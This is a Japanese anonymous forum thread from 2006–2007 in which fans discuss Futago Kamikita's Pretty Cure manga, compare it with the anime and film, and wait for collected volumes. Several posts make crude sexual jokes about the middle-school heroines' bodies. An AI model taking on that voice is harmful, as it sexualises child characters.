135 :花と名無しさん:2006/12/01(金) 12:35:30 ID:???0
満薫はやっぱり憎まれ口の一つも言わなきゃね!

136 :花と名無しさん:2006/12/02(土) 16:39:25 ID:???0
ネタバレっほいので、明日の放送を見てから買お…。



137 :花と名無しさん:2006/12/04(月) 00:33:16 ID:???0
二ヶ月分のシナリオを凝縮できるんで、駆け足になる一方、いいトコ取りができてるよね。
その辺の有利さがあるのでアニメと比べるのはフェアではないかもしれないが、
それにしても、咲舞の立ち位置がブレてないのは大したものだと思う。
満薫が消えてからの行動とか感情が、終始一貫してて、ちゃんとつながってるもん。
ふたりが煮えたぎる池に飛び込むシーンは泣けたよ。アニメだったら号泣してたかもしれん。
あのひたむきさが、どうしてアニメでは表現できないのか・・・。

138 :花と名無しさん:2006/12/04(月) 18:59:27 ID:???0
アニメは満薫なんて最初からいなかったかのような感じでこの数ヶ月進行してたからな

139 :花と名無しさん:2006/12/05(火) 20:04:05 ID:???0
漫画とアニメは違うってわかっちゃいるけど
ふたご先生シリーズ構成、いやせめて脚本の
アニメが見たい。


140 :花と名無しさん:2006/12/06(水) 00:37:40 ID:???0
自分的には画面のレイアウトやってほしい。
ゴーヤーン邸の横の水面から潜水艦発射弾道弾みたいに飛び出てきたのは、
正直・・・・だった。あれだったら光の玉で処理して良かったと思う。
みどりの郷でも画面構成が、観客席中央の固定カメラから撮った舞台中継みたいで、
平板なんだよな。人物もカカシみたいに棒立ちだし。

141 :花と名無しさん:2006/12/06(水) 19:00:04 ID:???0
なかよし、買いたい
買いたいけど
このフロクの処理に悩む
今日もまた買えなかった

142 :断ちバナナ 沖  :2006/12/07(木) 13:46:35 ID:???0
>>139
かつて冒険王版の桜田吾作のコミカライズが逆にアニメのエピソードの原作になったことがある。だから上北版をベースにしたエピソードがTV放映
される望みは無いとも言えないぞ。
>>141
俺は毎月(発売日が近い関係上)BUBUKAといっしょになかよしを買ってるが、本屋の親父はどう思ってるんだろう。

143 :花と名無しさん:2006/12/07(木) 17:11:00 ID:???0
映画コミック良かったよ!
来期プリキュアの漫画版もふたごが描いてくれるのだろうか
ぜひ継続して欲しいし、そろそろふたごのオリジナル漫画も読みたい

144 :花と名無しさん:2006/12/07(木) 19:26:21 ID:???0
その前に無印とMHのコミック完全版が欲しい。

145 :花と名無しさん:2006/12/07(木) 20:09:18 ID:???0
SS2巻の残りのページに入るとかだったりして

146 :花と名無しさん:2006/12/08(金) 00:37:55 ID:???0
読者が混乱するからそれはないでしょ。
無印&MHはあくまで単独で出して欲しい。
つーか、ふたご先生のコミックは画面の情報量が多いから、
全部A4サイズとかで出して欲しい。

147 :花と名無しさん:2006/12/08(金) 02:37:56 ID:???0
全篇収録+豪華書き下ろし含むハードカバーの愛蔵版とか

148 :花と名無しさん:2006/12/08(金) 07:45:00 ID:???0
そしたら鑑賞用・保管用・予備と3冊くらい買っちゃうね

149 :花と名無しさん:2006/12/08(金) 12:03:59 ID:1xMRs4V60
中国で「ふたりはプリキュア」がリアル美女でデビュー!
http://www.new-akiba.com/archives/2006/12/post_5395.html

150 :花と名無しさん:2006/12/09(土) 14:20:57 ID:???0
本日映画版コミックゲット。
何か絵柄が凄いというか迫力ある画風に感じた。
舞の表情がやたら色っぽいのは何なんだろう…例えるなら1巻の「咲ったら」みたいな

151 :花と名無しさん:2006/12/09(土) 20:40:51 ID:???0
>>149
ほのか役すげぇそっくり。面長でピタッと頭に付いたボリュームのない
髪のいかにもな中国美人と言った感じで。

152 :花と名無しさん:2006/12/10(日) 23:26:38 ID:???0
本スレ見てない、なかよしもまだ買ってない、映画は単行本だけ買った自分ですが
オビの裏にあるあのロゴは一体・・・5って。

153 :花と名無しさん:2006/12/10(日) 23:49:51 ID:???0
ま、今を楽しもうよ。

154 :花と名無しさん:2006/12/11(月) 22:30:58 ID:???0
どっちも見てきた
映画より漫画版の方が出来よかったな
回想シーンの「カラオケ大会のために」「おまもり」は映画ではまったく書かれてないし
サーロインがやたらパーフェクト言ってたし
時が戻る所も微妙に違ってた

流石に映画のような流れるような超高速バトルは漫画じゃ味わえないけどね
今まで同様、両方見ると更に楽しめる

155 :花と名無しさん:2006/12/12(火) 00:34:51 ID:???0
自分的には、優劣より単純に違いが目立ったって感じだった。
時間的な問題から、ふたご先生は最終決定稿になる前のシナリオに基づいて執筆したんだろうな。

>154の言うとおり、両方見て相互補完すればよしと。
映画には映画なりの良さもあるし。某スレでも書いたが、
映画版には「プリキュア史上もっとも美しい変身シーン」がある。

156 :花と名無しさん:2006/12/12(火) 05:37:28 ID:???0
成田日記によるとシナリオは半年以上前に上げてたらしいんで、時間的余裕はあったと思うぞ

157 :花と名無しさん:2006/12/12(火) 13:12:52 ID:???0
入稿が発売日の一カ月前として、本文が約150頁で執筆に三ヶ月強。
事前のネームチェックとコンテチェックが2〜3週間というところか。
ふたご先生も7月末から8月初旬には劇場版コミックにとりかかっていたと見るべきか。



158 :花と名無しさん:2006/12/12(火) 20:20:58 ID:???0
> プリキュア史上もっとも美しい変身シーン
あれは美しい…というかエロかった

159 :花と名無しさん:2006/12/13(水) 08:28:01 ID:???0
美しい変身シーンってのが気になる。
映画はいつもコミックスを読んでDVD待ちなのでどんなのか楽しみだ

160 :花と名無しさん:2006/12/14(木) 01:33:50 ID:???0
楽しみと言うのなら、
是非、劇場に足を運んでいただきたいです。
ホント、よかったよ。

161 :花と名無しさん:2006/12/16(土) 11:06:51 ID:???0
うん。漫画読んで映画観て…DVD出たら買うぞって思った。

162 :花と名無しさん:2006/12/16(土) 22:02:28 ID:???0
背景はさすがにアシスタントかな
ちょっと精密すぎてる気がした

163 :花と名無しさん:2006/12/17(日) 11:18:04 ID:???0
書き込みとかトーンとか丁寧に緻密になっている今もいいが
素朴な雰囲気の無印MH版も味があって好き

SSの日常分が不足しているので2巻描きおろしたくさん期待

どうでもいいが回が進むにつれて
舞の髪のほつれ具合が激しくなっている気がする

164 :花と名無しさん:2006/12/18(月) 19:31:59 ID:???0
ふたごにはそろそろオリジナルを描いてもらいたいナ

165 :花と名無しさん:2006/12/22(金) 10:57:58 ID:???O
>>164
元アニメータ作家に最も求めていけない物を…

166 :花と名無しさん:2006/12/22(金) 13:31:28 ID:???0
そうかな?無印MAXの漫画版読む限り
オリジナルストーリーで恋愛漫画描いてもなかなか…というか最強だと思うのだが

167 :花と名無しさん:2006/12/25(月) 06:31:50 ID:???0
無印やMHの漫画は、公式のパロディ集だからなあ。
すでにある物を再構築するのは得意そうだけど、
オリジナルでキャラやストーリーや設定をゼロから作るのは苦手そう。

168 :花と名無しさん:2006/12/25(月) 06:40:28 ID:???0
赤塚賞で佳作取ってるベテランだから問題ないと思う

169 :花と名無しさん:2006/12/28(木) 13:57:56 ID:???0
本日なかよし発売。プリキュアS☆S最終回。

花が咲き 鳥が舞い 風が薫る! 月が満ちる!

以上。

170 :花と名無しさん:2006/12/28(木) 14:43:15 ID:0oz7f6fA0
発売日あげ

171 :花と名無しさん:2006/12/29(金) 02:58:33 ID:???O
もう漫画の咲と舞は結婚するしか無いですね。

アニメなら咲と和也が結婚して
舞と義理の姉妹になるという展開もありうるけど。

172 :花と名無しさん:2006/12/29(金) 11:25:17 ID:???0
いや、ありえない、ありえない(笑)。
中学生が結婚まで行くって、どんだけ長編やねん。

173 :花と名無しさん:2006/12/29(金) 22:42:49 ID:Pb4NcnKt0
>>167
ラブリー冬の号にアクビちゃんが載ってたんで読んだが、
あれって構成はほとんどオリジナルだよな。あれぐらい
まとまった話を書けるんなら苦手とは思えないよ。

というかぶり返すようだけど、チクタクは映画よりコミックの方が
脚本演出が長けてたし。”咲と舞がカラオケ大会に出ることになったいきさつ”
が劇中で描かれてないのは正直痛すぎる。もう時間の都合とかいうレベルじゃないだろ。
あとサーロインはコミックの方がキャラが立ってると思う。

キャラに関してはキャラデザの職歴もあるし、ゼロから作るの苦手なはずがない。
先生はオリジナル作品描いた方が儲かる気がしてきた。

174 :花と名無しさん:2006/12/29(金) 22:48:56 ID:e0o243uEO
そこで先生のオリジナルのきまぐれマタタビシスターズですよ。
単行本かされてないのが痛いけど、初めて読んだ時、なかよしらしくない絵だけど何だか衝撃を受けたのを覚えてる。

175 :花と名無しさん:2006/12/29(金) 23:01:36 ID:???O
あぁ、プリキュアよりはアクビちゃんに近い絵だったな。
まだなかよしにセーラームーンが載ってた時代で。

しかし冷静に考えるとふたご先生の絵は少女誌向きじゃないよなぁ。
かと言って少年漫画ともマニア誌向き萌え系とも違うし…
ああいうアニメ絵が合いそうな雑誌はコミックボンボンくらいしか思いつかない。

176 :花と名無しさん:2006/12/30(土) 10:32:10 ID:???0
昔懐かしのテレビランドの番宣6ページ漫画という印象だな

177 :花と名無しさん:2007/01/02(火) 09:46:55 ID:???0
>>140
グレートマジンガーへのオマージュだろ

178 :花と名無しさん:2007/01/09(火) 16:20:12 ID:8JRL9CQ/0
あげ

179 :花と名無しさん:2007/01/13(土) 09:32:55 ID:Q5EDJXn2O
今のマニアックなかよしには会ってる。

180 :花と名無しさん:2007/01/21(日) 15:45:50 ID:???0
少女コミックに移って、エロ漫画を……

181 :花と名無しさん:2007/01/23(火) 00:01:03 ID:02d03s5r0
第二回漫画最萌トーナメント 本選1回戦

1/23(火) Eブロック10組
<<美墨なぎさ(キュアブラック)@ふたりはプリキュア>>の投票日です
一票お願いします


コード発行所
http://msaimoe.2-d.jp/m02/
コピペリスト
http://max.45.kg/mangasaimoe/0123.html
投票スレ
http://etc6.2ch.net/test/read.cgi/vote/1169475025/

182 :花と名無しさん:2007/01/23(火) 18:56:10 ID:???0
吉井凛 トレースパクリ クッキー集英社より
http://p.pita.st/?m=hmbvestv
↓左、ロゴにあわせたほうに注目
http://p.pita.st/?1zaxc8e6
606 :花と名無しさん :2007/01/23(火) 18:04:22 ID:???0
>>594
一枚目の奴、ロゴが!!! ロゴがそのまんまや〜〜〜!!!
こりゃ言い訳できんね。

183 :花と名無しさん:2007/01/27(土) 00:44:57 ID:HWRGktvZO
映画版S☆Sやっと入手。

いい表情がたくさん描かれていて満足。
映画に足を運べない鶏肉野郎なので、話の相違点とかは
全くわからないんだが、着ぐるみの生い立ち話って
あれはマンガオリジナルなの?猿じゃない予定だったってやつ。
(バレ禁止でご迷惑な質問ならばスルーしてくれろ。)

184 :花と名無しさん:2007/01/27(土) 01:01:57 ID:???0
マンガのオリジナルかどうかはわからないけど、
映画では、触れてなかったような気がする(一度しか見てないからうろ覚え)。
初期の脚本にあったくだりが、映画ではカットされて、
マンガでは残ったってことかも。他にも違いはチョコチョコある。
劇場版アニメは4月に発売されるから、トリ肉さんも安心して見れるよん。
比べてみるのもオツなもん。

185 :花と名無しさん:2007/01/27(土) 01:14:29 ID:???0 ?2BP(0)
>>183
「何でカラオケ大会に出る事になったか」
「何でこんな衣装にしたか」

この辺は映画版では物の見事に跡形も無くカット

186 :花と名無しさん:2007/01/27(土) 11:53:12 ID:???0
映画は漫画のためのダイジェスト版だったんだよ。

187 :花と名無しさん:2007/01/27(土) 21:03:37 ID:???0
>>183
漫画の方がいろいろ説明がされていて丁寧な作りだと思うが
映画の方も動きとか変身とか必殺技とか見所はある
映画の方は尺が足りなかったんでしょう

188 :花と名無しさん:2007/01/29(月) 05:30:54 ID:???O
>>184-187
レスさんくす。

「元はタヌキを作る予定だった」
の台詞で少し驚いたもんでね。タヌキ出してきたかと。


本編のアニメは綺麗に着地したようだし、
S☆S2巻の情報及びプリ5のマンガ版はどうなるのかに
期待しましょう。

189 :花と名無しさん:2007/01/29(月) 09:49:20 ID:V7kWwrS80
yesプリキュア5やるけど

190 :花と名無しさん:2007/01/29(月) 09:52:27 ID:V7kWwrS80
ついでにyesプリキュア5のホムペ追加ね。
http://www.toei.anim.co.jp/tv/yes_purecure5/

191 :花と名無しさん:2007/01/30(火) 10:20:42 ID:???O
たとえ暴走してもスポンサーの押しつけとかじゃなくて
スタッフのやる気の表れなら応援するよ。

ナージャも中盤のスペイン編やローズマリーの台頭は
画面からすごいパワーを感じたもの。

最終回は完全にやる気抜けちゃってたけどね…

192 :花と名無しさん:2007/01/30(火) 10:23:52 ID:???O
すまんアニメスレと娯爆

193 :花と名無しさん:2007/02/02(金) 20:09:25 ID:???0
畜生。こいつはやばい。

ttp://prettycure.from.tv/love/gazou/src/1170413880848.jpg

194 :花と名無しさん:2007/02/02(金) 22:39:37 ID:???0
>>92
激しく同意。

>>193
やばいな。

195 :花と名無しさん:2007/02/02(金) 22:51:11 ID:???0
もう神様レベルだな。
やぶうち優とは違う意味で。

196 :花と名無しさん:2007/02/03(土) 01:12:34 ID:???0
やばい。ますますやばい。

ttp://prettycure.from.tv/love/gazou/src/1170422449402.jpg



197 :花と名無しさん:2007/02/03(土) 01:14:58 ID:???0
>>196
あぁん、おかぁさぁん!おかぁさぁん!
怖いよー! 怖いよー! 腰がえっちだよぉー!


198 :花と名無しさん:2007/02/03(土) 20:15:56 ID:???O
>>196
挿入した

199 :花と名無しさん:2007/02/04(日) 01:36:04 ID:???0
アニメは分からないけどふたご先生のためになかよしは買うぜ

200 :花と名無しさん:2007/02/04(日) 01:42:06 ID:???0
ttp://2ch-news.net/up/up39747.jpg
年長組もとても良い

201 :花と名無しさん:2007/02/04(日) 12:44:29 ID:???0
なかよし読んだけどかなーり電波じゃないのかこれは・・・
アニメはまだ落ち着いた作りだったけども。


202 :花と名無しさん:2007/02/04(日) 13:41:08 ID:???0
さて、放送みたし、なかよしとたの幼買ってこよう。

>>201
来週、電波全開な展開を期待してる。w

203 :花と名無しさん:2007/02/05(月) 23:43:26 ID:???O
アニメ「なんじゃこりゃ?」
漫画「なんじゃこりゃあぁぁぁぁーっ!?」

ふたご先生、絶対松田優作を意識して描いたなw

204 :花と名無しさん:2007/02/06(火) 04:19:58 ID:???0
りんが男前でカッコいい!

205 :花と名無しさん:2007/02/06(火) 14:39:38 ID:???0
なかよし買ってきた。
ふたご先生の破壊力は健在どころか増強されていた。
それにしてもプリキュア部ってのは・・・すごいな。

206 :花と名無しさん:2007/02/06(火) 21:14:28 ID:???0
歴代のプリキュア模写してみたけどキュアドリームがやばいくらい描きやすい
一番描きづらかったのはキュアブルームだった

207 :花と名無しさん:2007/02/06(火) 22:32:54 ID:???0
なんかプリ5は絵に悪く言えば変なくせというか
よく言えば絵柄が変わったというかなんか前までと違う
眼の描き方が変わった?

実はプリキュア5はプリキュアファイ部だったりして

208 :花と名無しさん:2007/02/07(水) 12:53:26 ID:???0
ようやく見た。相変わらずふたご先生には非の打ち所がない。

のぞみの顔つき、咲と舞を足して2で割ったような気がした。

トップページがカラーだし、ココがイケメン、本誌の裏表紙が
プリキュアの広告…、なかよし読者層取り込みに本腰入れてる
っぽいね。

209 :花と名無しさん:2007/02/07(水) 16:53:54 ID:???0
ほかになかよし発のアニメがないから、
プリキュアが小学生向け仕様になっているのかもしれない。

210 :花と名無しさん:2007/02/08(木) 01:03:08 ID:???0
プリキュアだけ読んでここ数ヶ月積んでた本誌を開いたら小川と斎藤が始まってて吹いた。
ふたご先生目当てに買ってた増刊でやってた妙に気の抜ける漫画だったけど
これって人気あったんだなあ・・・同じくらいプッシュしてもらいたいもんだ。

211 :花と名無しさん:2007/02/13(火) 06:30:50 ID:???0
講談社はオンデマンドやってんだから
それででもいいからさっさと出して欲しい。

212 :花と名無しさん:2007/02/15(木) 09:29:06 ID:???0
白泉社山岸涼子の日出る処の天子最終巻11はP90の薄っぺらで200円て前例もあるんだから
講談社もプリキュアSS2巻も出せよー!

213 :花と名無しさん:2007/02/15(木) 14:17:04 ID:???0
>>212
千花ちゃんのこと思い出して涙がでた

214 :花と名無しさん:2007/02/15(木) 22:10:56 ID:???0
>>212
講談社は1を出したからって2以降出すとは限らんからなー・・・
子供向けのS☆S小絵本も1でフプムプで終わったまんまだし。
TV絵本も最終話までいってないんじゃない?

215 :花と名無しさん:2007/02/17(土) 12:26:23 ID:???0
私は講談社を信じています。
信じてるから出してー

216 :花と名無しさん:2007/02/17(土) 12:59:59 ID:???0
編集が出したくても営業がダメっつったらダメなんかな

217 :花と名無しさん:2007/02/18(日) 18:21:20 ID:???0
漫画家って単行本の印税が太いんでしょ。
もうその理由だけでも、出すのが当然って思うんだが・・・。

218 :花と名無しさん:2007/02/19(月) 09:47:47 ID:???0
>>217
タイアップ物だから、普通の作品より貰える印税は少ないだろうけどな

219 :花と名無しさん:2007/02/19(月) 11:24:18 ID:???0
>>218
その代わり、毎月の原稿料のほかに東映側からも
金が出てるだろうね。

220 :花と名無しさん:2007/02/20(火) 15:23:39 ID:???0
ああ〜かみきたせんせいさいこう

221 :花と名無しさん:2007/02/21(水) 17:07:59 ID:???0
ふたご先生の絵が神すぎ

222 :花と名無しさん:2007/02/21(水) 23:26:48 ID:???0
ぱあああああ

223 :花と名無しさん:2007/03/01(木) 17:51:26 ID:???0
この人絵うまいよなー
デフォルメされててもバランスに違和感ないし…
少し絵柄が古い感じもするけど、それはそれでかわいい絵
(古いというかわざとレトロにしてるのか?)

プリキュアは特に好きってわけじゃないけど、漫画は見てる

224 :花と名無しさん:2007/03/01(木) 18:17:24 ID:???0
足の形がきれいなんだよな。
あと、デフォルメが特徴的で躍動感がある。

225 :花と名無しさん:2007/03/02(金) 14:38:24 ID:???O
今月はラブリーもあるんだよな
発売は17日か、載ってるかどうか分からんが発売日忘れない様にしとこ

226 :花と名無しさん:2007/03/03(土) 13:16:48 ID:???O
おおスゲェ〜っ!ナッツもだが、
特にココがアニメより三割増しでキラキラしてる!

いいぞふたご先生もっとやれ!
ファイブの人気がアップすれば過去三作の単行本化の可能性も出てくるしな。

227 :花と名無しさん:2007/03/03(土) 14:40:38 ID:???0
とりあえず買うのは明日の放送見てからにしよう。

228 :花と名無しさん:2007/03/03(土) 14:52:19 ID:???0
アニメでも今の所上手くできてるんだが
なかよしのこまちは特におっとり具合が上手く再現されててとても萌える
笑顔もアニメより自然な感じでとても可愛い

229 :花と名無しさん:2007/03/03(土) 17:57:08 ID:???0
こまちママンの「ここなら、二人が住んでもあやしまれないと思うわ」
って言ってるときの笑顔が良いな。
801が見たいという下心があるんだろうがw

230 :花と名無しさん:2007/03/03(土) 19:41:15 ID:???0
>>227
あーたぶん漫画の内容はアニメより2〜4話先をいってるっぽい

231 :花と名無しさん:2007/03/03(土) 21:51:55 ID:???0
SSからアニメ本編の内容をコミック化しているが
無印、MAX版みたいなふたご版プリキュアサイドストーリーを読みたい
それと、背景が巧いんだけど、ふたごらしいバタ臭い「味」が薄まったような気がする

232 :(`ハ´)名古屋の名無シナーギャ:2007/03/04(日) 00:01:05 ID:Ltvb3LOj0
いきなり質問してまうけどヨ、
3月号で連載開始しとるyes!プリキュア5ってなかよし読者に人気あるんか?



233 :花と名無しさん:2007/03/04(日) 00:20:19 ID:???0
>>232
まだ2話目なのにそんなこと言われても

234 :花と名無しさん:2007/03/04(日) 02:08:42 ID:???0
なかよしは買ったら、プリキュアだけ切り離して、
表紙のちっちゃいイラストだけ切ってすぐ捨てちゃうんだけど、
目次の上北コメント欄のイラストが今号はりんで先月って誰だった?

235 :花と名無しさん:2007/03/04(日) 03:04:02 ID:???O
覚えてないのに答えるのも何だが順当だとのぞみだったんじゃない?>>234

236 :花と名無しさん:2007/03/04(日) 09:32:31 ID:???0
>>234
のぞみと淫獣形態のココとナッツ

237 :花と名無しさん:2007/03/05(月) 02:00:18 ID:???0
今月号は大車輪でストーリー端折ってるな。
とりあえずキャラ紹介と相関関係の整理と舞台背景でまとめた感じ。
しかし、まったく不満とか不足を感じないのは、絵がエロいからか?
それはともかく、戦闘シーンを完全省略したのは、プリキュア無印の頃の
日常描写の重視という方向に戻ったと期待していいのかなぁ。

238 :花と名無しさん:2007/03/05(月) 15:56:39 ID:???0
>>237
まぁ、無印時代でもイルクーボ戦を1コマで終わらしたりしてるし・・・。
四話詰め込みでしかも少し先行となれば仕方ないよね。
まぁ、それがちっとも不自然でないのが、上北マジックですが

239 :花と名無しさん:2007/03/06(火) 01:03:06 ID:???0
しかし毎月十何ページでちまちま描かせるだけというのはほんと勿体無い。
去年のラブリーみたいに40Pでもちゃんと描ける人だし。

240 :花と名無しさん:2007/03/06(火) 20:05:37 ID:R+1va9tRO
今回のシリーズは、おにーさんキャラクターがいいね
北上さんの絵だからなのか、なんとなく色気を感じた

241 :花と名無しさん:2007/03/07(水) 15:33:25 ID:???O
×北上
○上北

242 :花と名無しさん:2007/03/07(水) 19:05:39 ID:???0
なかよしかってきた
またえらいはしょったな
ドーナツwww
イケメンと上北先生は最高やで
サイン会いきてー

243 :花と名無しさん:2007/03/08(木) 19:55:25 ID:???0
ところどころページ数の都合で抜いた状態で話を繋いであるけど、実は描いてはある部分が
(たとえば12ページ目と13ページ目の間は個人技を浴びせてるシーンが)あったりして
単行本では補完されるって感じを、想像した

244 :花と名無しさん:2007/03/14(水) 13:30:55 ID:???0
おーそうかもしれないね〜
今日はなかよしを上北先生のところだけとった
こういう作業をなんと言うのだろう?

245 :花と名無しさん:2007/03/14(水) 15:30:25 ID:???0
スクラップか?

246 :花と名無しさん:2007/03/15(木) 22:42:19 ID:???0
おーそうそうスクラップだ
あんがとう

247 :花と名無しさん:2007/03/16(金) 21:57:15 ID:sDNLmk9X0
ラブリーに掲載あるらしいよ。誰か買った?

248 :花と名無しさん:2007/03/17(土) 00:05:38 ID:???0
ttp://www.usamimi.info/~prettycure/love/src/1174046594225.jpg

明日、買ってくる。

249 :花と名無しさん:2007/03/17(土) 02:44:42 ID:???O
ラブリー買った。ココとのぞみの親密を上げた感じ
みんなを持ち上げるナッツにワロタ

250 :花と名無しさん:2007/03/17(土) 13:08:14 ID:???O
ギャグとラブコメ色が強くて楽しかった
画力凄くある人だね
ナッツの連続ボケにやられたw

ページ数増やして欲しいなぁ、もっと読んでみたい
こういうのはアンケートで人気出ると変わって来るのかな…、
久しぶりにアンケート送ってみよう

251 :花と名無しさん:2007/03/17(土) 17:27:13 ID:???0
上北先生すげー。
・お姫さま抱っこネタだけで、ここまでやるか。
・かれんのバイオリンをBGMに昼飯とは贅沢じゃねーか。
・でもって、うらら。おまえ何杯喰ってる?
・じいやならいいのか?

252 :花と名無しさん:2007/03/17(土) 19:41:47 ID:???0
ふたご先生はなんでも描けるな
たまにはこういう真面目に少女漫画してるのも悪くない

253 :花と名無しさん:2007/03/17(土) 21:05:23 ID:???0
いくぞココ!おう!
カッコイイ〜

うわっ

の間合いがすごい
4,5回見返したけど洩れなく笑えた

254 :花と名無しさん:2007/03/18(日) 22:26:14 ID:???0
>>251
うらら、どんぶり3杯重ねて、4杯目食ってるなw
中身写ってないけど何食ってるんだ、これ。

ところで、ナッツの店で飲んでるジュースって
「COCONUT MILK JUICE」…ココナッツミルクジュース!
何もこんなネタにされやすいジュース飲ませんでも(笑)

255 :花と名無しさん:2007/03/22(木) 00:25:06 ID:???0
え?SS2巻って出ないの?

256 :花と名無しさん:2007/03/22(木) 14:39:18 ID:???0
ミルクとジュースという第三第四のケモノの伏線だったりして
今までプリキュア見ていなかったけど、追加ケモノあるんでしょ?

257 :花と名無しさん:2007/03/23(金) 03:54:14 ID:???O
あったけど……今回に関しては増えなくていいや。掘り下げが薄いままになるし

258 :花と名無しさん:2007/03/23(金) 14:22:04 ID:???0
順番を変えるだけで、エライことになる。
しかし、オリジナルと雰囲気はあまり変わってないような。

ttp://2ch-news.net/up/up51656.jpg



259 :花と名無しさん:2007/03/23(金) 15:35:02 ID:???0
2回「良かったの?」って聞く好奇心旺盛なこまちに吹いたw

260 :花と名無しさん:2007/03/24(土) 00:38:32 ID:???0
うああおおお・・・

261 :花と名無しさん:2007/03/27(火) 01:35:00 ID:???0
>>260
うぴっ?

262 :花と名無しさん:2007/03/27(火) 10:28:51 ID:???0
じいやにしか触らせたことないのに・・・

263 : ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄:2007/03/27(火) 21:41:33 ID:XXpAHZ080
       /\___/ヽ
    /ノヽ       ヽ、
    / ⌒''ヽ,,,)ii(,,,r'''''' :::ヘ
    | ン(○),ン <、(○)<::|  |`ヽ、
    |  `⌒,,ノ(、_, )ヽ⌒´ ::l  |::::ヽl  
.   ヽ ヽ il´トェェェイ`li r ;/  .|:::::i |
   /ヽ  !l |,r-r-| l!   /ヽ  |:::::l |
  /  |^|ヽ、 `ニニ´一/|^|`,r-|:「 ̄
  /   | .|           | .| ,U(ニ 、)ヽ
 /    | .|           | .|人(_(ニ、ノノ




264 :花と名無しさん:2007/03/28(水) 19:33:21 ID:???0
坂本さんは宦官状態だから安心です

265 :花と名無しさん:2007/04/01(日) 19:07:16 ID:???0
うはwwwwww
プリキュアのコミックス第一巻ゲットしたんだが、
巻末のおまけ4コマはエロ杉だろ
百合百合でちょっと引いたよ

応募券で当たる複製原画欲しいなぁ

266 :花と名無しさん:2007/04/02(月) 14:46:36 ID:???0
まるで猫ダンゴだね

267 :花と名無しさん:2007/04/03(火) 10:26:31 ID:???O
>>266
あの淫獣達の猫ダンゴシーン、
きっと飼ってる猫を参考にして描いたんだな

来月号はいつもと違って
1日が発売日らしい>なかよし

268 :花と名無しさん:2007/04/03(火) 12:59:35 ID:af3WIsdm0
発売日あげ
うーん、変身に何の意味が。
必ずプリキュアを出すっていう縛りでもあるのかな。
それともHR増ページのあおりで、本編のページ数
削られたのかな。

269 :花と名無しさん:2007/04/03(火) 13:14:29 ID:???O
タイアップ連載だから
当然ガチガチな縛りはあるでしょう(~_~;)

絵のクオリティは高いし、もう少しページ増やして欲しいもんだ

270 :花と名無しさん:2007/04/03(火) 16:01:57 ID:???0
ふたごセンセの絵はクオリティ高いと思うけど時折ケバイと思うこともある
特にかれんの絵はあんまり好みじゃない

でも、ページ数は増やしてほしいな
もっとこってりしたふたご漫画が見たい

271 :花と名無しさん:2007/04/03(火) 17:50:36 ID:???0
というより、5でまた画風変えたような気がする。

なぎほの、咲舞、そして5と、それぞれ雰囲気違う。
アクビガールもまた違うし。

272 :花と名無しさん:2007/04/04(水) 15:39:38 ID:???0
>270
かれんの顔はちょっと怖いかもね。

画風を変えられるってのは器用で凄いなあ。
作風が全然違うものでも似たような画風になる人も多いのに。

273 :花と名無しさん:2007/04/05(木) 23:13:44 ID:???0
ケバイというか、りんちゃんの眼はちょっと凄いよなw

274 :花と名無しさん:2007/04/06(金) 15:55:56 ID:???0
今月号買った。プリキュア5の前のページが
レイプ&凌辱3分前って場面で噴いた。
なかよし、すげーな。


275 :花と名無しさん:2007/04/11(水) 02:52:34 ID:???O
S☆S2巻マダァ-? (・ω・`)っ/凵⌒☆チンチン

276 :花と名無しさん:2007/04/18(水) 01:03:40 ID:???0
チクタクDVDリリースですよ。レンタルはもう始まってるけど。
ここはコミックスと比較して楽しむべきでしょう。
コミックスの方が細やかなフォローが多く、
劇場版の批判の根拠にされた面もあったけど、どちらも楽しい出来栄えです。

277 :花と名無しさん:2007/04/19(木) 01:28:05 ID:???0
DVD届いたので観たけど、別に
漫画版と比較とかどうこうなしに全然良かった。


278 :花と名無しさん:2007/04/21(土) 00:12:44 ID:???0
なかよしのプリキュア5の付録…ほしいかも…

逝ってきます。

279 :花と名無しさん:2007/04/23(月) 17:37:44 ID:???0
プリキュアの付録なんてあったっけ?

280 :花と名無しさん:2007/04/26(木) 01:51:34 ID:???O
付いてほしいって希望じゃないの?>>279

281 :花と名無しさん:2007/05/01(火) 12:45:47 ID:yCZqoBSc0
キターといい、目次と本編欄外のコメントといい、
上北センセ、ぶっ飛んでます。

しかし馬の描画…何書いてもうまいな。

282 :花と名無しさん:2007/05/01(火) 19:46:36 ID:???O
プリキュア5の単行本はまだかココー?

283 :花と名無しさん:2007/05/02(水) 08:48:04 ID:???0
>>282
一回の量が今のところ平均十数ページと異常に少ないので
たぶん一年で一冊になると思うナツ

284 :花と名無しさん:2007/05/02(水) 11:01:44 ID:4dkW5Rd50
>283
ラブリーの分があるからな。

5とSSで3巻か?

285 :284:2007/05/02(水) 11:02:07 ID:???0
あげてしまったスマソ

286 :花と名無しさん:2007/05/02(水) 13:28:20 ID:???O
>>278
そういえば先月号のアンケートで
どの作品の付録が欲しいですか?って問いがあった
ここにプリキュア5を挙げてる
アンケートが多かったら、今後あるのかも

287 :花と名無しさん:2007/05/02(水) 17:43:05 ID:???0
なるほど。今月は、アメとムチならぬ
パフェとムチだったわけね。



288 :花と名無しさん:2007/05/03(木) 22:13:41 ID:???0
今月のラブリーには載るんだろうか

289 :花と名無しさん:2007/05/14(月) 14:02:12 ID:???O
プリキュア5の漫画初めて見たけど
過去3作品と絵柄がだいぶ違うなぁ

290 :花と名無しさん:2007/05/14(月) 15:03:47 ID:???0
こまちさんのキウイ食すシーンエロすぎます・・・

291 :花と名無しさん:2007/05/15(火) 23:39:13 ID:???0
のぞみがエロいっていうけど、こまちもうららも腰周りがエロ杉…

292 :花と名無しさん:2007/05/16(水) 21:22:38 ID:???0
などと供述しており、犯行については否認しているということです。

293 :花と名無しさん:2007/05/16(水) 22:09:39 ID:???0
こまちの姉のエロさはもはや異常だぞ。

294 :花と名無しさん:2007/05/17(木) 19:15:21 ID:???0
本日、ラブリーゲット。
ふたご先生はどこまでいくのだろう?
毎回毎回、予想を上回ってくれる。

295 :花と名無しさん:2007/05/17(木) 20:15:31 ID:???0
フルカウルの変態スズキバイクにして欲しかった。


296 :花と名無しさん:2007/05/17(木) 20:17:09 ID:???O
戦闘シーンというか、プリキュア変身なくて少しびっくりした
プリキュア姿をどこかに挟むとかの決まりは別にない?
日常のシーンがたくさん見れて良かった

初夏号はギャップがテーマかな
漫画読んでるだけでも
ふたご先生、楽しく描いてるんだろうなって伝わって来るのがいいね
単行本のおまけページが今から待ち遠しい

297 :花と名無しさん:2007/05/18(金) 17:39:51 ID:???0
